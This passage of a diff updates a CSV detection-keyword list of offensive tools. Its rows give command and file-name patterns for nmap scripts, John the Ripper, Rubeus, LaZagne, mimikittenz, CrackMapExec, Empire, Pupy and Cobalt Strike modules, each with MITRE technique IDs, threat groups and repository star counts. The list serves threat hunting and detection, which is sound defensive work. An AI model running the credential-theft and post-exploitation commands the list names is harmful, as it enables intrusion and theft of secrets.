TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"* mask?a?a?a?a?*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* --mask=?1?1?1* --min-len*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* --max-attack-time*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"* mask?a?a?a?a?*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --mask=?1?1?1* --min-len*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --max-attack-time*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "* maxdb-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mcafee-epo-agent.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -mdns y -mdnsunicast n*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" -"* -mDNSTTL *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -mDNSTTL *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* membase-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* membase-http-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* memcached-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* memorpy *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* memorydump.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"* memorpy *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* memorydump.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "* memreader.c *","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" "* MemReader_BoF*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" -"* merlin.py *","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" -"* met_inject*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* merlin.py *","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"* met_inject*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* metasploit-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* metasploit-msgrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* metasploit-xmlrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -method * -nthash *","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","4","389","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"* -method * -nthash *","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" "* Microsploit.sh*","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","0","N/A","N/A","5","430","133","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" "* mikrotik-routeros-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* mimikittenz*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* mimikittenz*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* mmouse-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mmouse-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* modbus-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -1276,21 +1276,21 @@ "* mongodb-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mongodb-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mongodb-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* monitor /interval:* /filteruser:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* monitor /interval:* /filteruser:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* moodlescan -r -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* mqtt-subscribe.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* mrinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* MS15-034.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "* ms17010 -i *","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "* ms17010 -n *","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" -"* msfdb run *","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"* msfdb run *","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 